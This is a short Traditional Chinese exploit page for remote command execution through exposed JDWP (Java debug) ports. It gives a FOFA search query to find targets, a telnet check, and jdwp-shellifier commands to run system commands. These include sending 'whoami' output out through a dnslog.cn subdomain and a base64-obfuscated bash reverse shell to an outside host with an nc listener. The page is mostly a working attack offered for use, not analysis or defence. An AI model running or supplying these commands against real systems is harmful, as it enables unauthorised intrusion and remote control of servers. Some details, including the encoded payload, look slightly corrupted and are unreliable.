JDWP_遠程命令執行漏洞_zh-hant

# JDWP 遠程命令執行漏洞/zh-hant

==FOFA==

banner=”jdwp” && port="8000"

==POC==

telnet xxx.xxx.xxx.xxx 8000

返回以下信息,表示漏洞存在。但是請注意,部分情況下無任何回顯也能成功利用。

JDWP-Handsharke

==EXP==
https://github.com/IOActive/jdwp-shellifier

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "whoami"

使用Dnslog回顯:

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "ping http://.`whoami`.yoww7w.dnslog.cn"

==Getshell==

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,YmFzaCAtaSA+JiAvfrV2L3RjcC8xOTIgrth4LjE4NS42Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}"

監聽機器執行:

nc -lvp 8888
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容